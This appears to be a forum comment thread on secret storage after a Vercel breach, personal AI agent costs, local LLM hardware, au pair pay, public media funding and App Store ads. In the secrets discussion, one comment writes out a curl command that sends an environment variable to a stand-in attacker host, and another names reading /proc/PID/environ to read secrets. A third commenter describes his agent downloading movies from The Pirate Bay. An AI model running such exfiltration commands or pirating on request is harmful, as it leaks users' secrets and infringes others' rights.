For most CLIs, I definitely feel extra network calls because they translate to real latency for commands that _should_ be quick.
If I run "gh alias set foo bar", and that takes even a marginally perceptible amount of time, I'll feel like the tool I'm using is poorly built since a local alias obviously doesn't need network calls.
I do see that `gh` is spawning a child to do sending in the background (https://github.com/cli/cli/blob/3ad29588b8bf9f2390be652f46ee...), which also is something I'd be annoyed at since having background processes lingering in a shell's session is bad manners for a command that doesn't have a very good reason to do so.
If it's done in a background process then it won't impact the speed of the tool at all. When the choice is between getting data to help improve the tool at the cost of "bad manners" whatever that means, the choice is pretty easy.
They said "encrypted at rest", which they almost certainly are.
If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.
Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?
Keepass has an option to "encrypt in memory" certain passwords, sensitive information.
The point of encryption is often times about what other software or hardware attacks are minimized or eliminated.
However, if someone figures out access to a running system, theres really no way to both allow an app to run and keep everything encrypted. It certainly is possible, like the way keepass encrypts items in memory, but if an attacker has root on a server, they just wait for it to be accessed if not outright find the key that encrypted it.
This is to say, 99.9% of the apps and these platforms arn't secure against this type of low level intrusion.
Even Keepass's "encrypt in memory" option leaves that encryption key in memory, so it can auto-type or copy passphrases into form fields. It's an extra step, but not unbreakable.
And even then the passphrase is put into form fields in plaintext, so there's *got* to be some sort of attack to grab those. They must be in memory decrypted at some point.
It always comes back round to "you can't have your cake and eat it".
dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/
Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.
The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.
> If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext
Same for sops.
> The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend
The encrypted .env file is actually committed to source code, and the decryption key is placed in Vercel's environment variables dashboard. The attacker only gained access to the latter here if using dotenvx so they can't get your secrets. Unless they also gained access to the codebase in which they have terabytes of data to go through and match up private keys from the database with encrypted .env files from the source code exfiltration - much more effort for attackers.
There is no silver bullet, but Dotenvx splits your secrets into two separate locations.
1. The private decryption key - which lives on Vercel in this example
2. The encrypted .env file which lives in your source code pushed to Vercel
Attackers only got access to the first (as far as I know was reported). So your secrets would be safe in this attack if using Dotenvx. (A private key is useless without its corresponding encrypted .env file. Attackers need both.)
If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.
Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.
A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.
"encrypted at rest" is great to guard against stolen laptops, or in the server room both against people breaking in and stealing servers (unlikely at the security level of most hyperscalers, but possible) or more commonly broken HDDs being improperly disposed
How does that transalte to VMs? If "encryption at rest" is done at the guest level, instead of (or in addition to) host, that would be pretty close to minimal "encrypted except when it use" time and protect against virtual equivalents of pulling a hard drive out of a data center.
Glib response, but in reality you basically cannot do anything in a modern Linux system without root except read and write files in your home directory.
You can, theoretically, decompile the system memory dump and try to mine the credentials out of the credential server's heap, but that exploit is exponentially more difficult to do that a simple `cat /proc/1234/environ`.
They need to give your app the environment variables later so they cannot throw away the key.
For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.
Things like 'NODE_ENV=production' vs 'NODE_ENV=development' is probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values even ignoring the "running your app" part.
You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.
If you buy the 'iPhone Max' for $1500, you get ads, and if you buy the 'iPhone Max ad-free' for $3800, you don't get any ads in the app store, apple maps, apple news, or the various other apple services you use on only that one device. Similarly, you need to buy the ad-free edition of the iPad to not get ads there, and the ad-free version of the macbook for no ads there, and each of them can cost ~2.5x the cost.
I think that would be better than a monthly subscription since you'd just pay it once and then never think about it again.
There is no way they’re making that much per phone on adding ads.
YouTube’s who platform is built to show ads and run by an ad company. They are likely going to be much more profitable than a few ads in the App Store and Maps, and I’ve read Premium users are more profitable than ad-supported users. They are charging $160/year after a recent price increase. The fee you’re suggesting would be over 14 years worth of payments.
Amazon lets users remove ads on Kindle for a 1 time fee of $20, and people keep Kindles a long time.
The goodwill alone would be worth more than $20, considering iPhones already have margin (unlike most Amazon hardware).
Apple has been using security as the tent pole feature to try and differentiate themselves from everyone else. One of the reasons all the other platforms feel insecure is that ads imply data collection. If they really want to “think different” they need to stop following the crowd and operate a system that doesn’t create the compromised incentives that ads tend to come with.
They'd have to have an iron will to not do what every other leading platform has done, which is to:
- Gradually "make the line go up" by ramping up ad volume until the product is terrible (thereby ruining Apple's reputation among the 50-90% of users who aren't paying the ad-free prices).
- Periodically nerfing the premium ad-free tiers and putting ads into tiers that were previously ad-free.
- Purposefully making the lower tiers worse and worse in order to squeeze out marginal increases in conversion rates to the premium tiers.
I have it hooked up to my smart home stuff, like my speaker and smart lights and TV, and I've given it various skills to talk to those things.
I can message it "Play my X playlist" or "Give me the gorillaz song I was listening to yesterday"
I can also message it "Download Titanic to my jellyfin server and queue it up", and it'll go straight to the pirate bay.
It having a browser and the ability to run cli tools, and also understand English well enough to know that "Give me some Beatles" means to use its audio skill, means it's a vastly better alexa
It only costs me like $180 a month in API credits (now that they banned using the max plan), so seems okay still.
So that leads to a question: Is there a physical box I could buy that an amortize over 5-7 years to be half the API cost?
In other words, assuming no price increase, 7 years of that pricing is $15k. Is there hardware I could buy for $7k or less that would be able to replace those API calls or alternativr subs entirely?
I've personally been trying to determine if I should buy a new GC on my aging desktop(s), since their graphic cards can't really handle LLMs)
You can't realistically replace a frontier coding model on any local hardware that costs less than a nice house, and even then it's not going to be quite as good.
But if you don't need frontier coding abilities, there are several nice models that you can run on a video card with 24GB to 32GB of VRAM. (So a 5090 or a used 3090.) Try Gemma4 and Qwen3.5 with 4-bit quantization from Unsloth, and look at models in the 20B to 35B range. You can try before you buy if you drop $20 on OpenRouter. I have a setup like this that I built for $2500 last year, before things got expensive, and it's a nice little "home lab."
If you want to go bigger than this, you're looking at an RTX 6000 card, or a Mac Studio with 128GB to 512GB of RAM. These are outside your budget. Or you could look at a Mac Minis, DGX Spark or Strix Halo. These let you bigger models much slower, mostly.
Thanks. That is what I suspected. The 3090's in my area seem pretty expensive for a several year old second hand card - they are the same price as a new 5080.
5090 is pretty expensive (~$4000) to justify it over a $10-50 sub. I guess the nice thing is the api side becomes "included", if I ever want to go that route. But if I have a GHCP $40 sub vs a $4000 GC to match it, just on hardware, pay off is at 8 years. If I add in electricity, pay off is probably never.
Sure, the sub can go up in price, but the value proposition for self-running doesn't seem to make sense - especially if I can't at least match Sonnet on GHCP or something like that.
I hope to self-run some not useless LLMs/Agents at some point, but I think this market needs to stabalize first. I just don't like waiting.
For what it's worth, eBay in the US currently has some used 3090s for about $1,300, including some marked "Buy it now." I got mine used for about $1,000, and I'm really happy with it—it's a very solid gaming card for Steam on Linux (if you don't need ray tracing), and it allows me to experiment with models up to about 35B parameters. I'm not saying it's a good investment for you in particular, of course! But it's solid at that price, and you can just chuck it in any consumer gaming rig and get a really fun AI "home lab".
As for models, I'm really genuinely impressed with Gemma4 26B A4B and Qwen3.6 35B A3B right now. Between them, I've seen solid image analysis, good medium-image OCR on very tough images, very good understanding of short stories, good structured data extraction from documents, extremely good language translation, etc. If you wanted to build a custom tool which summarized your inbox/RSS feeds/local news every day, or extracted information from emails and entered it into a database, or automatically captioned images, those tasks are all viable locally. The quality of the results is up dramatically in the last 12 months. At this point, my old personal non-agentic LLM benchmarks are "saturated": All the current leading models score extremely well on literally anything I was asking last year.
It's the true agentic coding workflows where the big models really stand out. And those models are all large enough that the hardware needs to amortized over enough users to run 24 hours/day.
> or a Mac Studio with 128GB to 512GB of RAM. These are outside your budget.
M3 ultra with 80GOu cores and 256GB of ram is $7500 - that’s right at the edge of the budget, but it fits.. if you can get an edu discount through a kid or friend you’re even better off!
You can buy a roughly $40k gpu (the h100) which will cost $100/mo in electricity on top of that to get about 30-80% the performance of OpenAI or Anthropic frontier models, depending what you're doing.
Over 5 years, that works out to ~$45k vs ~$10k, and during that duration, it's possible better open models will come available making the GPU better, but it's far more likely that the VC-fueled companies advance quicker (since that's been the trend so far).
In other words, the local economics do not work out well at a personal scale at all unless you're _really_ maxing out the GPU at close to 50% literally 24/7, and you're okay accepting worse results.
As long as proprietary models advance as quickly as they are, I think it makes no sense to try and run em locally. You could buy an H100, and suddenly a new model that's too large to run on it could be the state of the art, and suddenly the resale value plummets and it's useless compared to using this new model via APIs or via buying a new $90k GPU with twice the memory or whatever.
Note that the (edit: US) postal system is a for-profit system.
Given the trends of the capitalist US government, which constantly cedes more and more power to the private sector, especially google and apple, I assume we'll end up with a state-run model infrastructure as soon as we replace the government with Google, at which point Gemini simply becomes state infrastructure.
> Note that the (edit: US) postal system is a for-profit system.
That's not correct. If USPS makes more revenue than their expenses for a year, they can't pay it out as profits to anyone.
It's true that USPS is intended to be self-funded, covering it's costs through postage and services sold, and not tax revunue. That doesn't mean there's profit anywhere.
> Note that the (edit: US) postal system is a for-profit system.
Pricing in the US postal system is not based on maximizing profit. Ths US postal system is not a for-profit system, at all. It is a delivery system (more or less) that happened to start turning a profit (2006) until PAEA. After that, the next time it made a profit was 2025.
For something like OpenClaw you realistically only need rather slow inference, so use SSD offload as described by adrian_b here: https://news.ycombinator.com/item?id=47832249 Though I'm not sure that the support in the main inference frameworks (and even in the GGUF format itself, at least arguably) is up to the task just yet.
You can get quite good models running on a Mac Studio, but these will not rival a frontier model.
$3,699.00
M4 Max 16c/40c, 128GB of RAM, 1TB SSD.
LM Studio is free and can act as a LLM server or as a chat interface, and it provides GUI management of your models and such. It's a nice easy and cheap setup.
I mean, I'm getting $180/mo worth of fun out of playing with it and figuring out what it can do that it's worth it.
Like, no one bats an eye at all the people paying $100/mo for Hulu + Live TV, or paying $350/mo for virtual pixels in candy crush / pokemon go / whatever, and I'm having at least that much fun in playing with openclaw.
Just for reference: I pay 8€ for mobile, 40€ for internet and some occasional 5€ for VPNs each month. That's all the digital service subscriptions I'll need to have fun.
I think paying $180/month because you don't want to walk 10 feet to a light switch or forgot the name of a 25 yo Gorillaz song you just heard is absurdly stupid.
I do see how a very busy businessman or a venture capitalist would gladly pay 180$/month to offload chores and mundane work from his schedule. That comes down to 6$/month, which probably matches his monthly coffee budget.
I would imagine that the list of digital chores of a very busy businessman are a bit more extensive. Even in your list, groceries is something that becomes digital once you're high enough in income.
My grocery store has offered a pick-up or delivery option ever since COVID. Pick-up actually cost nothing extra. It's been years since we used it so I can't say definitively that it's still free, but the downside wasn't cost: it was the ability to pick the best item. If you let the store choose, you'll get the saddest looking produce every time, and the meat that's set to expire tomorrow.
Does anyone pick the soggy vegetables and near-expired milk? This isn't really a preference--it's the store choosing what's in their best interest instead of your own.
We have our groceries delivered every week (sometimes semi-weekly), and have done since 2018 or so. The people who pick the order work for the store, the people who deliver are gig workers.
The only "selection" complaint I regularly have had is the bananas are nearly always very unripe - like several days from being edible. But then I went to the store myself for several weeks and realized they just never have ripe bananas.
In other words, they're doing as well as I could do if I were shopping it myself.
Not really. Groceries have to be planned based on existing pantry state (current manual analysis), and future desired meals. Then produce a delta of what you have and what you want for those different meals.
Then you have a shopping list. You can do the shopping digitally now a days, but once it's delivered, now you have to organize it into the pantry existing stock, probably with a way to ensure older items are used first. This might involve separating out certain ingredients into smaller packaging and freezing some for later use.
That is all very manual, and I don't see how digitizing one part greatly simplifies it, especially if the digitization is error prone.
In a high enough income state, the answer is you hire a personal household chef or something like that. That isn't digitizing the problem- that is outsourcing it.
> It only costs me like $180 a month in API credits
In The Netherlands you can get a live-in au-pair from the Philippines for less than that. She will happily play your Beatles song, download the Titanic movie for you, find your Gorillaz song and even cook and take care of your children.
It's horrible that we have such human exploitation in 2026, but it does put into perspective how much those credits are if you can get a real-life person doing those tasks for less.
I'm surprised to read that. Here in the UK, having a live-in au pair doesn't excuse you from paying the minimum wage for all the hours that they're working (approx $2300/month for a 35 hour week). You can deduct an amount to account for the fact that you're providing accomodation but it's strictly limited (approx $400/month).
The Netherlands has a weird and exploitative setup where you can classify your au pair as a "cultural exchange", and then pay them literal peanuts (room and board plus a token amount of "pocket money")
From what I can see online, the average compensation that an au-pair in The Netherlands receives is 300 euro per month, with living expenses being covered by the family. There is no minimum wage requirement for au-pairs like in the UK or the US.
The added cost of having an additional person to provide room and food for way exceeds that €300/month. Especially, when taking into consideration that you might have to extend/renovate the house to lodge another person. Adding an extra bedroom and possibly bathroom is not cheap.
Even if you assume the cost of lodging was 1000€ (which it isn't) then the au-pair would still be significantly underpaid.
A normal full time employee costs at least 2000€ a month (salary, tax, pension plan, health insurance, etc). If you are paying less than that you are definietly exploiting them.
So in reality you’re paying for their food, electricity and heat, letting them rent a room for free, and allowing them the use of the other facilities in your home and on top of that you’re giving them a spending allowance of 300 euro.
The marginal cost of food/electricity/bed for adding one additional person to a family is drastically less than those things would cost for a person living alone. Whichever way you slice this, the employer is making out like a bandit under this scheme.
The concept of having this kind of help is totally foreign to me, but with the exception of one, every family I’ve encountered that had an au pair have been two very busy high earning parents, neither of them lazy. I think you could argue that perhaps priorities have been misplaced, but not lazy.
A lot of people in the Silicon Valley area spend that much ($6/day) on coffee. What they don’t realize is how out of touch they are in thinking makes sense for the rest of the fucking world. $180/mo is about 5% of the median US per capita income. It’s not going to pick your kids up from school, do your taxes, fix your car, or do the dishes. It’s going to download movies and call restaurants and play music. It’s a hobby, high-touch leisure assistant that costs a lot of money.
They aren't selling it to the median US earner. They're selling it (and trying to generate FOMO) to the out of touch people so that it becomes so entrenched that the median earner will be forced to use it in some capacity through their interaction with businesses, schools, the government, etc.
The customer they’re picturing in their mind’s eye is obvious. The out of touch part comes in when you look at the size of that market— not big— with how likely that market is to grow drastically— not very— and the amount they’re investing in building the product— all of everything plus a bazillion. With what they’ve invested, if they end up with an institutional market the likes of Microsoft split up among the winners, they fucked up.
The economics of these businesses are based way more on hope and hype than rational analysis and planning.
Machines don't get tired, don't have to sleep, don't face principal-agent problems and can accumulate Skill.md instructions for decades without getting replaced. I definitely see the potential of something like OpenClaw for those who can afford it.
You're paying the au pair partly in accommodation, food, bills and a visa. The visa isn't coming out of your bank account, but it's definitely part of the incentive, so you could see it as a government subsidy.
For comparison, a full time "virtual assistant" with fluent English from the Philippines costs upwards of $700/month nowadays.
Framed this way - then “replacing” this kind of human exploitation is definitely a good for humanity. If someone doing a job is practically a slave, then replacing them with an electron to token converter is a good thing.
The number one goal of AI should be to eliminate human exploitation. We want robots mining the minerals we use for our phones, not children. We should strive to free all of humanity from dangerous labour and the need for such jobs to exist.
If Elon Musk wants Optimus robots to help colonize Mars shouldn’t he be trying to create robots that can mine cobalt or similar minerals from dangerous mines and such?
Then allow me to be judgemental in your stead. I've done a similar setup as the above and completely locally. I dunno how they're paying so much, but that's ridiculously overpriced.
All the other models performed much worse for the skills I'm using. I tried gpt-5.1 (and then 5.4 again recently), and also tried pointing it at OpenRouter and using a few of the cheaper models, and all of them added too much friction for me.
Be judgemental all you want, but I feel like I'm paying for less friction, and also more security since my experiments also showed claude to be the least vulnerable to prompt injection attempts.
In a possible defense of grandparent, whenever I pirate movies these days (seldomly), it would be not because I don’t want to pay, but either because I want the offline reliability or because I just can’t find it elsewhere.
(The latter would however not be the case for Titanic, I imagine.)
It's not the only thing they're doing with it. I mean, the logic is sound - $180 goes into automating bunch of manual processes in personal life, one of which is getting movies, which in some cases involves going out on the high seas.
180 grand a month for PA is a lot of money. But I guess each person has its own priority. I mean, I can pay a very fancy gym with that price instead of the shitty popular one I go, which would probably improve my well being much more than asking to play Gorillaz
Am I right to be a little concerned by the phrase "it'll go straight to the pirate bay"?
Not to be a narc or anything, but is OpenClaw liable to just perform illegal acts on your behalf just because it seemed like that's what you meant for it to do?
> Not to be a narc or anything, but is OpenClaw liable to just perform illegal acts on your behalf just because it seemed like that's what you meant for it to do?
There's at least a couple of dozen instances right now, somewhere, getting very close to designing boutique chemical weapons.
One where there's 50 playlists and your hands are wet because you're right in the middle of doing dishes. Besides, your phone is in the other room anyway.
While I love the idea of using it for home/personal automation (and it sounds like you've done a good job executing it), this comment makes it seem like avoiding paying for The Titanic is almost as important as having an OpenClaw-driven assistant/automation system.
When I message my claw "Mark that I had 825 calories for lunch today", it has marked down 825 correctly 100% of the time so far.
It shows me way fewer ads than all the popular fitness apps and loads way quicker since it doesn't have to load like 10MB of ads for me to enter one number, so it seems like a good improvement.
I do not think it's an improvement over an excel sheet, but as the average openclaw user, I would rather pay anthropic $10/day in API credits than create a google sheets document.
I do something similar with Claude Code. I say, "I ate a single serving of that Toasted Beef Ravioli that Aldi sells." Claude web searches, finds it, gets its nutrition info, then uses gspread to add it to the daily food log tab of my spreadsheet.
So much less hassle, lower activation energy needed than with MyFitnessPal.
A free press is important to democracy, so the government should move some tax money to journalists, and then this link could instead be to a taxpayer funded site (like NPR) instead of to a for-profit ad-powered spam-site run by billionaires who pay journalists as little as possible while pocketing as much as they can.
Unfortunately, PBS and NPR are so severely under-funded that they need to run donation drives and can't do journalism of this level.
We adopted this in Canada and Facebook/Instagram have banned news since 2023.
The idea is that social media companies offer summaries of news that replace reading the article for most people. Thanks to commenters bypassing paywalls they can get the full article too!
News companies cannot effectively negotiate with large social media companies for a slice of ad revenue due to discrepancies in size.
The government proposed a compulsory licensing scheme where websites with an "asymmetric bargaining position" (i.e
Big Tech) that link to news must pay.
Google is paying $100 million,[1] Meta walked away from the negotiating table.
I can’t believe someone actually makes this suggestion after seeing what has happened in the last year. The Trump administration cut funding for PBS and NPR because he didn’t like what they were saying.
This isn’t new. The government has been trying to cut funding for PBS since the 60s.
Why would anyone want the government to fund the press? How would you actually expect it to cover government corruption?
It functions fine in many countries though. E.g. a lot of European countries have public broadcasters paid by tax money and they sure do criticize and mock government.
Commercial broadcasters tend to lean towards entertainment (needs ad revenue), so news becomes entertainment too.
It works as long as the state and public believes in democracy, accountability, etc. It’s very vulnerable, but everything in democracy is. Democracy and free press can only work if the population also defends it, which is what is failing in the US. The majority of population does not want to defend democracy.
So my point is invalid that you shouldn’t depend on government funding of media because if the government doesn’t like what you say they will remove funding when that’s exactly what they did?
But I think the hard on for PBS that conservatives have is that PBS admitted gay people exist.
Back in the 60s PBS was controversial partially because it showed black and white kids playing together on Sesane Street…
Well it worked for 80 years it seems and now that the USA does not have a democratically acting government anymore they want to get rid of the funding.
Press that does not need to be profitable is extremely valuable to a democracy as it can openly talk about any issues without a conflict of interest.
Good democracies have that funding and no meddling of politicians with the content enshrined in their constitution.
So exactly when was the US a “good democracy”? 80 years ago segregation was still in the South based on a ruling by the Supreme Court “separate but equal”.
Even until the 80s it was legal to arrest a homosexual couple for having sex in their own home based on “sodomy” laws.
Today women are dying because doctors are afraid of performing medical necessary abortions to save their lives because they might go to jail
They have been trying to get rid of funding since at least 1969 when Mr. Rogers himself went before Congress to try to keep it.
Let's be clear that Democrats support democracy and the democratic process. Republicans support oligarchy and a new gilded age of robber barons.
If government actually funded news in the public interest, it would mean that Democrats were in charge. Sure, Republicans could always cut funding or pressure publicly funded news if they returned to power. It would be our job to make sure that didn't happen. Publicly funded media can't work under corrupt Republican administration.
But, it's also true that commercial media is being bent under pressure from the Trump administration. Republicans will try to break anything which they perceive as limiting their power. Your narrow focus on publicly funded media seems to miss that big picture.
Democrats don’t support “wrong speak” any more than Republicans - it’s just a different type of wrong speak. I a socially liberal Black guy who supports almost every type of equal rights imaginable would immediately get cancelled and liberals would try to de platform me once I speak out against the one bridge too far for me - biological men in women’s sports or other women only competitions.
What about "cowork", aiming to be the claude code of excel files and pdfs and screenshotting your desktop to tell you what's wrong?
Like, that feels like it's also a huge amount of token churn ("sure, I can search every xls file on your machine to find the 2023 invoice from that company"), and very early in its adaption curve.
Most people are still using AI as a webpage chatbot to ask questions to and copy+paste between, but running an "openclaw" like assistant, which can access your files, email, and opens you up to wild security attacks, that seems like a really big killer app.
Cowork to me also seems like it'll take longer to reach the broader market since the models are less good at "use the mouse and keyboard to do this repetitive task" than "write code", but I see it as having killer-app potential with lots of token churn.
I think The Verge said it the best. Taking advantage of these tools to the maximum requires you to have "software brain" which the average person does not have. They struggle to set up a simple automation in their smart home platform of choice. There is little reason to believe they will take the leap to use such tools to simplify daily tasks because it requires people to think about which daily tasks can be simplified and automated.
I don't think 'software brain' is required for non-coding tasks. Rather, it requires 'manager brain', the ability to delegate, direct, and review the output. Manager brain is more prevalent than software brain and likely learnable by many knowledge workers who don't yet have it.
I think you still need software brain, because ultimately, this stuff still has limitations driven by software constraints, and having the AI try to explain it to them doesn't necessarily help.
I think we all have had experiences with people treating their computers as magic boxes and not understanding why certain requests simply are not possible to satisfy.
A growing number of non-technical managers are now using Claude Code to build small custom software. A larger share will use Cowork to automate routine business tasks. Claude Cowork will become easier to use and more automated over time, as it learns the user's preferences, just like a good executive assistant does.
Granted, it's possible that a majority of people will not acquire proper 'manager brain' either and we'll see how that pans out. Evolutionarily, managerial skills are much more aligned with what many hunter-gatherers might learn as they mature and become more of an advisor than a doer.
Even if only 10-20% of people end up using multiple autonomous agents regularly for their work and business, that will change the economy. Contrast this with <1% of people who develop software professionally.
You have to recognize that it's a problem to delegate in the first place. One example I love to trot out is, do you have any toilet seats in your life that kinda slide around bit and don't seem securely attached? It's absolutely trivial to fix this, and it's really annoying when it happens, yet with shocking frequency I encounter people who've just been dealing with the annoyance because they didn't process it as something they could solve.
It's not that easy to fix, and it can be kinda gross, and once it happens once, it tends to happen again in fairly short order. I'm someone that's fixed those loose seats countless times, and continues to do so, but the gap between me noticing it and fixing it is consistently growing.
You also need the brain of not giving up after 2/3/10 tries. I don't know what the exact numbers are but if something doesn't work properly after the second or third try a huge percentage of people give up.
Yes. And that’s not a criticism of average people. Tools should fit the user not the other way around. Designs systematically removed shadows and visual clues. Developers render buttons off the screen requiring a scroll to submit. Hard to criticize the user under those circumstances. But there are people with art brains, and math brains, and software brains. So it may be the case that AI adoption is limited by how it expects the user to relate to the tool
The whole point of click and point (gui) was that one barely had to engage the brain vs using a terminal.
The ideal experience is where one’s resources are able to be allocated such that one can achieve some goal with minimal effort. We are very far away from this ideal with llm’s and absurd amounts of money has already been spent.
The point of AI is that it's supposed to be intelligent. Why silo it in an app? Instead of telling it what to automate, shouldn't it sit at the OS level, watch everything you do, and figure out what to automate by itself?
Most people don’t have good enough hardware to run a decent model. I’m not even sure if any local models can handle image input (but I’m by no means an expert in local models).
So if you’re going to need the data center to process it, then you run into the same issue Microsoft did when they announced the OS feature where they took screenshots of your desktop all the time for advanced search or whatever. People consider it to be a privacy issue.
> shouldn't it sit at the OS level, watch everything you do, and figure out what to automate by itself?
Read that again and really ask yourself if you want a private company to have access to all that and the ability to do whatever it wants with your system at the OS level.
On a smartphone, you're trusting Apple or Google to make the OS. They already can do anything they want with your system. Do you read every line of code in every security update?
Humans do not want something sitting at the OS level, watching everything you do. Microsoft, famously, tried this and the backlash was immediate and intense.
If you believe you can do better, then build it! I don't think the tide has changed though.
"Push buttons for me" in the most common ways I see it used ("add this ticket to Jira so I don't have to") is a nice timesaver for being lazy but it's not a 10x multiplier to justify the subscribe-forever cost.
I think it's more likely that the companies that employ large numbers of people to perform manual push-the-button-then-the-other-button workflows will replace the tools that need button-pushing with other sorts of automation.
And outside of work I wouldn't spend any money on something to save myself the ten minutes of logging in to pay my credit cards or check my bank statements once a month or so. I have no real need for an always-running assistant and even the things that it seems most useful for today (beating unassisted humans to the punch for limited-quantity things) are only something it could help with as long as only a very few people have access.
An AI that consumes every document on the system in response to a simple search request is going to be fired just as quickly as a human who does the same thing not long after replacements able to use conventional search tools to efficiently accomplish the same task are widely available.
Similarly, customers who rely on AI cowork tools will come to favor systems and applications that expose AI-friendly interfaces, which shouldn't be difficult to implement in most cases under the assumption that the models in question are already good at consuming API documentation and writing code (and, for that matter, writing API documentation, refactoring, and generating relatively straightforward wrapper code).
I have less faith in the market's ability to effectively respond to security threats in a timely fashion, alas.
> What about "cowork", aiming to be the claude code of excel files and pdfs and screenshotting your desktop to tell you what's wrong?
I’ve been using these types of functions for a while for some specific use cases, and it’s super useful for this. Eg go into my budgeting app and explain to me why a certain discrepancy between forecast and actual occurred, which would otherwise cost me a huge amount of time.
I’ve also been using Cowriter AI, which actively learns from what you’re doing by taking screenshots of your screen every few seconds.
These types of utilities are just starting, they’re underexplored, and will definitely burn lots of tokens (while creating value).
> It strikes me as a classic case of "we need all the interested people to pull in one project, not each start their own".
And every few weeks in the cooking subreddit we get a new person talking about a new soup they made. Just think if we put all 1000 of those cooks in one kitchen with one pot, we'd end up with the best soup in the world.
Anyway, we already have "the one" project everyone can coalesce on, we have CephFS. If all the redditors actually hopped into one project, it would end up as an even more complex difficult to manage mess I believe.
I don't like companies forcing their newest features on me noisily and constantly trying to ship new features and see what sticks so you can't trust whether a feature advertised one week will even be there the next.
However, I have even less patience for companies forcing paid-for third-party ads down my throat on a paid product. Slack at least doesn't sell my eyeballs. Facebook, Twitter, Google's ads are worse to me than new feature dialogues.
Which brings me to Apple. I pay for a $1k+ device, and yet the app store's first result is always a sponsored bit of spam, adware, or sometimes even malware (like the fake ledger wallet on iOS, that was a sponsored result for a crypto stealer). On my other devices, I can at least choose to not use ad-ridden BS (like on android you can use F-Droid and AuroraStore, on Linux my package manager has no ads), but on iOS it's harder to avoid.
Apple hasn't sunk to Google levels in terms of ads, but they've crossed a line.
I agree. App store is really horrible. Why is it that when I'm searching for a first party or a very very popular, the first result and many of the other results are weird scammy malware like things? I don't particularly care about the stupid homepage ads tho, I think thats just because I have "personalize app store recommendations" turned off.
Search inside Settings (both mac and ios) was also really really stupid for a long while. Why are you taking me to some random accessibility toggle when I'm looking for "displays" ? But I checked right now and it's good.
I get it but... well I think of App Store as... a store. I don't have to go there.
I'm actually pretty disappointed in the lack of discovery available in the App Store, but I rarely go there. I'm fine with advertising being there. I wish it was better but I'm not offended that there is paid promotion in a store.
>comes up with other banks, BankNames US app (not the country
you are in)
>revolut etc (cant use in the country you are in)
>ten minutes later
even worse when its your telecomm telling you to install their Official App so you can pay your bills or they will cut your cellular service, and you cant find it
I don’t see what that has to do with (increased) advertising on the App Store (IMO search there never has been good) or the comment you replied to in which colechristensen said: “I'm actually pretty disappointed in the lack of discovery available”.
I think paid advertising may even help improve discoverability on the App Store because, instead of making 10 or 20 to do list apps and hoping to get them to rank high by a combination of sheer luck and SEO tricks, scammers may only make one, and pay to get that to the top of the list.
In super markets product placement is affected by two factors: how much producers are willing to pay for a good spot (e.g. by offering lower wholesale prices if the product gets a more visible place) and vetting by the store owner.
I don’t think different solutions exist in the App Store. Apple doesn’t want to do much vetting, making advertising the only thing that may help (and yes, it would be awesome if there were a store that did do much vetting, but that requires a world where many different stores exist, and we aren’t there (yet))
> I think paid advertising may even help improve discoverability on the App Store
So my grandmother searching "Powerpoint" and getting malware instead of the microsoft app is good actually?
Let me compare some search terms and see if ads are giving me "better" results:
* ublock - surfshark vpn
* wordle - spammy adware word game
* slack - spammy adware game
* microsoft word - spammy spyware office app (not the one made by MS)
* every bank I could think of - different financial app
Like, this isn't a good user experience. The ads aren't relevant, even when you type in a hyper-popular app's name exactly, something like 80% of the time a competitor has sniped the top spot.
For the "microsoft word" search, the spam app had an identical logo to word, and I have no doubt many people have been fooled. If you look at the reviews, some of the 1 star reviews are detailed complaints, and all the 5 star reviews are inhuman sounding "This helped me do my job" and "great app" reviews.
> I don’t think different solutions exist in the App Store
Sorting roughly by popularity and reviews, and also doing a little more to combat fake reviews, seems like it would be better. It at least would mean that if I searched "bank name" my bank's app would come up, since for every bank I tried the first non-ad result was in fact the bank in question.
It would save grandmothers around the world who just click on the first result.
So you're saying a hypothetically well implemented advertisement service could be better than a hypothetical poorly implemented ranking service.
The reality is right now we have a poorly implemented advertisement service that shows malware, and if you ignore the ads and look at the search results based on relevance, they're clearly better.
The claim "A good ad service would be good" is a truism, but that's not the reality we live in.
As someone who recently moved to NL from the US I encounter this issue about once a week and it’s blocking me from doing serious things like paying for parking, taxes, utilities or government services, all of which have apps that are only available on the Dutch app store.
I have a separate Dutch Apple ID I can switch to, but each time I log out I risk accidentally deleting all my data.
> all of which have apps that are only available on the Dutch app store.
This isn’t really on Apple though. Blame the companies/developers for geo gating their apps. It’s a simple checkbox in the store to make it available for other countries.
I get an app recommendation from a friend, I go to the App Store and search for it. I have to be super careful about which link I'm actually clicking on and which app I'm installing, because the App Store is riddled with spam and malware.
I wouldn't mind, except that Apple charge 30% of everything with the justification that they are keeping the ecosystem free of spam and malware...
I’ve been installing apps from the App Store for more than a decade and have never ever accidentally downloaded spam or malware. I’m sure it’s there but it’s really not “riddled” with it in my experience searching for apps. What it’s riddled with is subscription-based apps whose free tier is worthless
I haven't noticed this at all and I wonder if you're mistaking curation for advertising? When I open up the App Store I get a panel written "games we love" and a listing of indie games that are clearly not paid for ads. The ads in search are visibly marked as ads, and while I don't particularly like ads in general, they are pretty easy to avoid.
Mine is Moneris Go, and the top review is titled "Garbage App!!!!" lol
